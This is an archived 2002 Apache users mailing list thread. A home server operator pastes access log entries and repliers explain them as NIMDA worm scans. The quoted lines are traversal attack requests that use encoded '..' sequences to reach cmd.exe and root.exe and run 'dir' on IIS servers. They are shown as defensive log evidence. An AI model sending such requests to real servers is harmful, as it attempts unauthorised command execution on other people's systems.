httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "David Kramlich" <daves...@bellsouth.net>
Subject Re: access log
Date Fri, 19 Apr 2002 15:28:37 GMT
Some firewalls and routers have routines to block the scans you see in your
logs. Check with the manufacturer of your router or build a linux router or
purchase a cheap cisco router w/12.1.2 IOS or higher to accomplish this.
----- Original Message -----
From: "Mike Hodson" <mike@mystica.cx>
To: <users@httpd.apache.org>; <r.douglass@onlinehome.de>
Sent: Friday, April 19, 2002 6:36 AM
Subject: Re: access log


> These are the telltale symptoms of someone on the internet who has the
> NIMDA internet worm, which thankfully only affects microsoft IIS users.
> though having countless log entries from this crap undoubtedly affects
> all of us, unix users included.
>
> Odds are it is someone who uses the same ISP you do, but they either
> have no clue it is on their systems, or have not yet run the latest
> patches/virus scanners. Its not your problem, and its probably not
> theirs either. I've had 170,000 log entries from NIMDA, and there are no
> signs its even slowing down. :(
>
>
> On Fri, 19 Apr 2002 10:43:04 +0200
> "Robert Douglass" <r.douglass@onlinehome.de> wrote:
>
> > Hello, I've been hosting a tiny website from my home for the past week,
as a
> > temporary project, and I found the following in my access log:
> >
> > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 329
> > "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > HTTP/1.0" 404 329
> > "GET
> >
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> > stem32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
295
> > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
312
> > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> >
> > Does anybody have an idea what someone was trying to accomplish with
this,
> > or if these requests may have originated from my ISP? Does anybody have
any
> > suggestions on how to implement some basic security (I've done nothing!)
to
> > protect myself? I'm using Apache 1.3.22. Thank you,
> >
> > Robert Douglass
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
>
> --
> Mike Hodson  <mike@mystica.cx>
> IRC: irc.mystica.cx #mystica or /msg me if im not actively talking.
> ICQ: 18145059
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message